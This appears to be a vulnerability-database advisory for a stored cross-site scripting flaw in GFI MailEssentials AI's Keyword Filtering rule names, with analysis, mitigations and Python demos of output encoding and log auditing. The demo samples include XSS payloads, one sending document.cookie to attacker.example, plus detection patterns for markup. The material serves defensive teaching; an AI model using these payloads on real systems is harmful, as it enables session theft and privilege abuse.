CVE-2026-23604: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in GFI Software MailEssentials AI
GFI MailEssentials AI versions prior to 22.4 contain a stored cross-site scripting vulnerability in the Keyword Filtering rule creation workflow. An authenticated user can supply HTML/JavaScript in the ctl00$ContentPlaceHolder1$pv1$TXB_RuleName parameter to /MailEssentials/pages/MailSecurity/contentchecking.aspx, which is stored and later rendered in the management interface, allowing script execution in the context of a logged-in user.
AI Analysis
Technical Summary
CVE-2026-23604 is a stored cross-site scripting vulnerability (CWE-79) in GFI Software's MailEssentials AI, affecting versions prior to 22.4. The flaw sits in the Keyword Filtering rule creation workflow: the rule name submitted in the ctl00$ContentPlaceHolder1$pv1$TXB_RuleName parameter (an ASP.NET Web Forms control name) of /MailEssentials/pages/MailSecurity/contentchecking.aspx is stored as supplied and later written back into the management interface without output encoding. An authenticated user with low privileges can therefore save arbitrary HTML or JavaScript as a rule name, and that script runs in the browser of any logged-in user who later views the page on which the rule is rendered, in that viewer's session context. Consequences include theft of session material, actions performed with the victim's privileges inside the MailEssentials AI console, and effective privilege escalation when a lower-privileged rule author's payload is viewed by an administrator. The CVSS 4.0 vector published with the record gives network attack vector (AV:N), low attack complexity (AC:L), no attack requirements (AT:N; in CVSS 4.0 the AT metric is attack requirements, not authentication), low privileges required (PR:L), passive user interaction (UI:P, meaning the victim only has to view the affected page), and low confidentiality and integrity impact with no availability impact. No public exploit has been reported. The record carries no patch link; the affected range implies that 22.4 is the fixed release, so remediation is upgrading to 22.4 or later.
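The following Python is an added illustration of the bug class described above, not GFI's code (the product's server-side rendering is not public). It models a stored rule name being written into a page both as text and as a form-field value, first without output encoding and then with contextual encoding. The sample rule names are constructed and the render functions are hypothetical stand-ins for the real .aspx page. It also shows why stripping angle brackets is not a fix: the attribute break-out payload uses no `<` or `>` at all.

```python
import html

# Constructed sample rule names. The first is benign; the second is the
# classic <script> case; the third breaks out of a double-quoted attribute
# without using '<' or '>' at all.
SAMPLE_RULE_NAMES = [
    "Block invoice spam",
    "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>",
    '" autofocus onfocus="alert(document.domain)',
]


def render_rule_row_vulnerable(rule_name: str) -> str:
    """Hypothetical rendering with no output encoding.

    Models the bug class the advisory describes (stored value written
    straight into the page); it is not GFI's actual rendering code.
    The value lands in two contexts, a text node and a quoted attribute,
    as a rule list with an editable name field would place it.
    """
    return (
        f"<tr><td>{rule_name}</td>"
        f'<td><input name="ruleName" value="{rule_name}"></td></tr>'
    )


def render_rule_row_fixed(rule_name: str) -> str:
    """Same row with output encoding applied in both contexts.

    html.escape(quote=True) encodes & < > " and ', which is sufficient
    for text-node and double-quoted-attribute contexts. Encoding only
    < and > would leave the attribute break-out payload live.
    """
    safe = html.escape(rule_name, quote=True)
    return (
        f"<tr><td>{safe}</td>"
        f'<td><input name="ruleName" value="{safe}"></td></tr>'
    )


def strip_angle_brackets(rule_name: str) -> str:
    """A naive input filter that only removes tag delimiters; included to
    show that this does nothing for the attribute context."""
    return rule_name.replace("<", "").replace(">", "")


def markup_survives(rendered: str, rule_name: str) -> bool:
    """True if a rule name containing HTML-significant characters reached
    the output unencoded, i.e. the browser will parse it as markup."""
    has_specials = html.escape(rule_name, quote=True) != rule_name
    return has_specials and rule_name in rendered


if __name__ == "__main__":
    for name in SAMPLE_RULE_NAMES:
        vuln = render_rule_row_vulnerable(name)
        fixed = render_rule_row_fixed(name)
        print(repr(name))
        print("  markup survives, vulnerable render:", markup_survives(vuln, name))
        print("  markup survives, fixed render:     ", markup_survives(fixed, name))
    # The bracket-stripping 'filter' leaves the attribute payload intact.
    filtered = strip_angle_brackets(SAMPLE_RULE_NAMES[2])
    print("after stripping <>:", render_rule_row_vulnerable(filtered))
```

The point of `markup_survives` is that the benign name passes through both renderers unchanged, while the two payloads reach the page as markup only in the unencoded version; the third sample is the case a tag-stripping filter misses.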
Potential Impact
The primary impact is execution of attacker-controlled script inside the MailEssentials AI management interface, in the session of whoever views the poisoned rule. That can be used to hijack the victim's session or, more directly, to issue requests with the victim's privileges from within the console: modifying or deleting email filtering rules, disabling protections, or reading configuration data. Because the payload is stored and rendered to every viewer, a lower-privileged user who is allowed to create rules gains an escalation path against any administrator who later opens the rule list. Confidentiality and integrity of the email security management environment are undermined, and an attacker who can alter filtering policy can weaken protection for the organization's mail flow. Availability is not directly affected, although loss of administrative control could disrupt email security operations. Deployments with several rule authors of differing privilege levels are the most exposed.
Mitigation Recommendations
Upgrade GFI MailEssentials AI to version 22.4 or later, which the advisory identifies as the fixed release. Until then, and again after upgrading, review existing Keyword Filtering rules for names containing HTML tags, event-handler attributes or script URIs and remove any that are found, since a stored payload persists until it is deleted. Restrict rule creation and management-console access to the smallest set of trusted administrators, following least privilege: the vulnerability needs only low privileges to plant the payload but fires in the context of whoever views it. Where a WAF or reverse proxy fronts the console, add a rule that blocks or alerts on markup in POSTs to contentchecking.aspx that carry the TXB_RuleName parameter, decoding URL and entity encoding before matching. Monitor access logs for POSTs to the rule-creation page from unexpected accounts, source addresses or client software. Input validation and output encoding on the rule name field are the vendor-side fix and cannot be retrofitted by operators of a commercial product. Finally, place the management interface on a restricted network segment or behind a VPN, so that a stolen low-privilege account alone is not enough to reach it.
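An added example, in Python, of the two checks called for above; it is not from the advisory or the vendor. It audits stored Keyword Filtering rule names for markup after undoing URL and entity encoding, and pulls POSTs to contentchecking.aspx out of an IIS W3C access log. The rule names and the log excerpt are constructed. One caveat the log part makes explicit: the default IIS log fields do not include the request body, so the TXB_RuleName value never appears in the access log. The log tells you who posted to the rule page, when and from where; the stored rule list is where the payload itself has to be looked for.

```python
import html
import re
from urllib.parse import unquote_plus

# Constructed sample: rule names as an administrator would see them in the
# Keyword Filtering rule list or export them from the configuration store.
STORED_RULE_NAMES = [
    "Quarantine lottery scams",
    "Block <b>urgent</b> wire requests",                             # markup, looks harmless
    "Finance &lt;img src=x onerror=alert(1)&gt;",                     # entity-encoded payload
    "Legal%20%3Cscript%3Efetch('//attacker.example')%3C/script%3E",   # URL-encoded payload
    'x" onmouseover="alert(document.cookie)',                         # attribute break-out, no '<'
    "Partner <-> vendor sync",                                        # angle brackets, not a tag
]

# Indicators are matched on the decoded name: a tag opener followed by a tag
# name, an on*= event handler after whitespace or a quote, or a script URI.
_PATTERNS = [
    ("html_tag", re.compile(r"<\s*/?\s*[a-z][a-z0-9-]*[\s>/]", re.I)),
    ("event_handler", re.compile(r"""[\s"']on[a-z]+\s*=""", re.I)),
    ("script_uri", re.compile(r"(?:javascript|vbscript|data)\s*:", re.I)),
]


def normalize(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of URL and HTML-entity encoding so that
    encoded payloads are matched in the form the browser would see."""
    for _ in range(rounds):
        decoded = html.unescape(unquote_plus(value))
        if decoded == value:
            break
        value = decoded
    return value


def classify_rule_name(name: str) -> list:
    """Return the indicator labels that fire on the decoded rule name."""
    decoded = normalize(name)
    return [label for label, pat in _PATTERNS if pat.search(decoded)]


def audit_rule_names(names) -> dict:
    """Return {rule_name: [indicators]} for names that look like markup or script."""
    findings = {}
    for name in names:
        hits = classify_rule_name(name)
        if hits:
            findings[name] = hits
    return findings


# Constructed IIS W3C excerpt. The default field set has no POST body, so the
# rule name submitted in TXB_RuleName is not recoverable from these lines.
IIS_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2026-02-19 18:40:01 10.0.0.5 GET /MailEssentials/pages/MailSecurity/contentchecking.aspx - 443 CORP\\alice 10.0.8.21 Mozilla/5.0 200
2026-02-19 18:40:37 10.0.0.5 POST /MailEssentials/pages/MailSecurity/contentchecking.aspx - 443 CORP\\alice 10.0.8.21 Mozilla/5.0 302
2026-02-19 23:12:09 10.0.0.5 POST /MailEssentials/pages/MailSecurity/contentchecking.aspx - 443 CORP\\svc_helpdesk 203.0.113.44 python-requests/2.31 302
"""

RULE_PAGE = "/MailEssentials/pages/MailSecurity/contentchecking.aspx"


def rule_page_posts(log_text: str) -> list:
    """Return (date, time, user, client_ip, user_agent) for every POST to the
    rule-creation page. Without the body, triage rests on who, when and from where."""
    fields = None
    results = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        rec = dict(zip(fields, line.split()))
        if rec.get("cs-method") == "POST" and rec.get("cs-uri-stem", "").lower() == RULE_PAGE.lower():
            results.append((rec["date"], rec["time"], rec["cs-username"], rec["c-ip"], rec["cs(User-Agent)"]))
    return results


if __name__ == "__main__":
    for name, hits in audit_rule_names(STORED_RULE_NAMES).items():
        print(f"suspicious rule name {name!r}: {', '.join(hits)}")
    for date, time, user, ip, ua in rule_page_posts(IIS_LOG):
        # A service account posting rules at 23:12 from a non-browser client
        # is the kind of record worth following up in the rule list itself.
        print(f"rule-page POST {date} {time} by {user} from {ip} ({ua})")
```

The audit deliberately requires a letter after `<` so that a name like "Partner <-> vendor sync" is not flagged, and it runs the patterns on the decoded value so that entity-encoded and URL-encoded payloads are caught the same way as plain ones.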
Affected Countries
United States, United Kingdom, Germany, Canada, Australia, France, Netherlands, Italy, Spain, India
Technical Details
- Data Version: 5.2
- Assigner Short Name: VulnCheck
- Date Reserved: 2026-01-14T16:02:29.333Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 69975aafd7880ec89b287c77
Added to database: 2/19/2026, 6:47:11 PM
Last enriched: 2/19/2026, 7:05:59 PM
Last updated: 2/21/2026, 12:20:09 AM
Views: 9